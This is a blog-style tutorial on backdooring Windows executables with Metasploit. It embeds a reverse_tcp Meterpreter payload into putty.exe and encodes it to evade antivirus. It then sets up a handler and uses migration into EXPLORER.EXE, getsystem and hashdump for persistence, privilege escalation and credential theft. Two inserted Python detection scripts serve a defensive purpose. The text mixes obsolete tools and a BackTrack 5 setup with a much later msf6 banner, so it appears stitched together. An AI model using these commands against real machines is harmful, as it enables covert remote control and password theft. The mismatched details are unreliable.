Backdooring with Metasploit

by Oddacon T. Ripper

Metasploit is a free, open-source pen-testing tool originally created by H.D. Moore in 2003.

Coded first in Perl, the Metasploit Framework was later converted to Ruby, and then officially signed over and picked up by the security group Rapid7.

Metasploit is available for all operating systems and comes pre-installed with BackTrack Linux, which is the OS I will be using in this article.

The good folks over at Offensive Security just released BackTrack 5.  So if you're new to BackTrack, I recommend downloading the ISO and booting live from a USB thumbdrive or DVD-R.

Once you have everything configured correctly, booted up, logged on, and connected to "your" Internet, we can finally set up our Metasploit attack!

To ensure we stay within the parameters of the law, I will be doing this Metasploit attack on my Windows 7 box.  We're just going to do a basic attack, inserting a backdoor into an EXE file.

We could just create an EXE backdoor, but that's no fun!  Instead, let's overwrite an already existing EXE file and install the backdoor onto that.

I'm going to use the program: putty.exe

Of course, you can choose whichever EXE you would like.  After you have an EXE of your liking we can create the backdoor using the payload command.

First, open a terminal and type:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1337 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -x /home/oddacon/Desktop/putty.exe -o /home/oddacon/Desktop/putty_h4x.exe

Where msfpayload is the program that will create our backdoor and windows/meterpreter/reverse_tcp is the type of payload we are using.

LHOST, obviously, is your local IP.

LPORT is the local port we are going to be listening on later.

The R selects raw output mode, and the pipe (|) passes that raw payload to another command: the encoder program msfencode, to hopefully bypass the victim's anti-virus.

-t exe says we are encoding a Windows binary.

-e defines the encoder to use.

The x86/shikata_ga_nai is generally best, but there are several other encoders to choose from, as I will explain later.

-c 1 defines the number of times to encode - I encoded just once.

And finally we specify the paths: -x /home/oddacon/Desktop/putty.exe is the path to where putty.exe or the EXE file you have chosen resides.

-o /home/oddacon/Desktop/putty_h4x.exe specifies the path you want the EXE with the backdoor to go.

Once you have executed that, you should see the output message:

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

We now have our backdoor "payload" ready for the victim to use.
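The file produced above, putty_h4x.exe, is a modified PE executable.  As an added defender-side example (not from this article, and not Metasploit's own code), the script below parses a PE section table and flags two properties an analyst would want to review in a binary received from an untrusted source: a section that is both writable and executable, and an entry point that falls outside .text.  The PE images in it are constructed, headers-only samples, and the checks are review heuristics, not a signature for msfencode output.

```python
import struct

# PE section characteristic flags (from the PE/COFF specification).
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def parse_sections(pe: bytes):
    # Walk DOS header -> PE signature -> COFF header -> optional header -> section table.
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsect = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry = struct.unpack_from("<I", pe, opt + 16)[0]      # AddressOfEntryPoint (RVA)
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i                       # 40-byte IMAGE_SECTION_HEADER
        name, vsize, va = struct.unpack_from("<8sII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append((name.rstrip(b"\0").decode(errors="replace"), va, vsize, chars))
    return entry, sections

def suspicious_findings(pe: bytes):
    # Heuristics only: flag W+X sections and an entry point outside .text for analyst review.
    entry, sections = parse_sections(pe)
    findings = []
    for name, va, vsize, chars in sections:
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name!r} is writable and executable")
        if va <= entry < va + vsize and name != ".text":
            findings.append(f"entry point 0x{entry:x} lies in {name!r}, not .text")
    return findings

def build_pe(entry, sections):
    # Constructed, headers-only PE32 image for testing; not a runnable executable.
    opt = (struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", entry)).ljust(224, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), vs, va, 0, 0, 0, 0, 0, 0, ch)
                    for n, va, vs, ch in sections)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    return dos + b"PE\0\0" + coff + opt + hdrs

# Constructed samples: a normal layout, and one whose entry point sits in a new W+X section.
TEXT, DATA = (".text", 0x1000, 0x2000, 0x60000020), (".data", 0x3000, 0x1000, 0xC0000040)
CLEAN = build_pe(0x1200, [TEXT, DATA])
TAMPERED = build_pe(0x4010, [TEXT, DATA, (".rsrc", 0x4000, 0x400, 0xE0000020)])
```

Run suspicious_findings() on a real file's bytes to get the list of findings; packers also trigger these heuristics, so treat a hit as a reason to look closer, not a verdict.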

We can then set up Metasploit to act as our server and wait for the victim's incoming connection through the backdoor EXE we just made.

Type clear and fire up the Metasploit console:

$ msfconsole
Metasploit tip: Display the Framework log using the log command, learn
more with help log


                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v6.3.46-dev                          ]
+ -- --=[ 2378 exploits - 1233 auxiliary - 416 post       ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 >

Be patient, as it will take a moment to load all the exploits, payloads, and other goodies.  After loading, Metasploit will tell you how many "goodies" you have in your framework and when you last updated it.

You can always update by typing: svn up and you can also view the different exploits, payloads, etc. by typing:

msf6 > show exploits
msf6 > show payloads
msf6 > show encoders
msf6 > show etc..

Since this is a manual attack, we are going to use the generic payload handler: multi/handler

So after the Metasploit console loads up, type:

msf6 > use exploit/multi/handler

Metasploit will then recognize that we are using this exploit and return:

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >

on a new line in the console.  Then we set the payload to the same one we used earlier in creating the backdoor file:

msf6 > set PAYLOAD windows/meterpreter/reverse_tcp

Metasploit should return:

PAYLOAD => windows/meterpreter/reverse_tcp

if done correctly.  Next, set the LHOST to your IP:

msf6 > set LHOST 192.168.1.2

(192.168.1.2 is my IP.)

and then the local port:

msf6 > set LPORT 1337

(This is the same port we used to create the payload earlier.)

Everything is now set up, but before we execute and run our server, we can type:

msf6 > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT     1337             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

to make sure everything is running properly.

Then type exploit to start the server and wait for our victim to run the backdoor: putty_h4x.exe

[*] Starting the payload handler...
[*] Started reverse handler on port 1337
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:1337 -> 192.168.1.4:1134)
meterpreter>

It did not take long (since this is a simulated attack!) for our victim to run the putty_h4x.exe file.

As you can see, Metasploit opened a session from our victim: 192.168.1.4

Now that we have established a connection using the command interpreter, meterpreter, let's get to work!

First, type ps to get a list of the system's running processes.  Then type: migrate [PID #]

For instance, I type migrate 2976 where 2976 is the PID number of the system's EXPLORER.EXE process.

[*] Migrating to 2976...
[*] Migration completed successfully.

Our backdoor is now within the EXPLORER.EXE process, so if the victim decides to delete putty_h4x.exe, the backdoor connection will not be broken.
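After the migration described above, the reverse connection to port 1337 is owned by EXPLORER.EXE rather than by putty_h4x.exe, which is exactly the kind of process-to-network pairing a defender can look for.  As an added detection example (not from this article), the script below flags connection events where a process that rarely initiates its own sessions, such as explorer.exe, talks to something other than a file-share port; the events are constructed Sysmon-style records, not real telemetry.

```python
# Constructed Sysmon-style network events for illustration; not real telemetry.
EVENTS = [
    {"time": "10:01:02", "pid": 2976, "image": "explorer.exe", "dst": "192.168.1.2",   "dport": 1337},
    {"time": "10:01:05", "pid": 4120, "image": "chrome.exe",   "dst": "93.184.216.34", "dport": 443},
    {"time": "10:02:10", "pid": 1502, "image": "outlook.exe",  "dst": "10.0.0.5",      "dport": 993},
    {"time": "10:03:40", "pid": 2976, "image": "explorer.exe", "dst": "10.0.0.7",      "dport": 445},
]

# Processes that rarely open their own TCP sessions; explorer.exe legitimately talks SMB to file shares.
RARELY_NETWORKED = {"explorer.exe", "notepad.exe", "calc.exe", "mspaint.exe"}
SHARE_PORTS = {135, 139, 445}
COMMON_PORTS = SHARE_PORTS | {25, 53, 80, 443, 587, 993, 995}

def flag_events(events):
    # Returns (pid, image, dst, dport, reasons) for each event worth an analyst's attention.
    flagged = []
    for ev in events:
        image, dport = ev["image"].lower(), ev["dport"]
        reasons = []
        if image in RARELY_NETWORKED and dport not in SHARE_PORTS:
            reasons.append(f"{image} initiated a non-file-share connection")
        if dport not in COMMON_PORTS:
            reasons.append(f"uncommon destination port {dport}")
        if reasons:
            flagged.append((ev["pid"], image, ev["dst"], dport, reasons))
    return flagged
```

The explorer.exe connection to 192.168.1.2:1337 is the only event flagged here; the later explorer.exe session to port 445 is treated as ordinary file-share traffic.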

From here, we can do a number of things.

For instance, the command getuid will return the current user the victim is running on.

The command getsystem will elevate your privilege.

Typing hashdump will display the contents of the SAM database.

There are still a number of commands we can use, such as downloading and uploading files, recording keystrokes and other information, and even shutting down the system.

For more info on meterpreter commands just type ? or help for the help menu.

And check out offensive-security.com/metasploit-unleashed for more information on the Metasploit Framework.
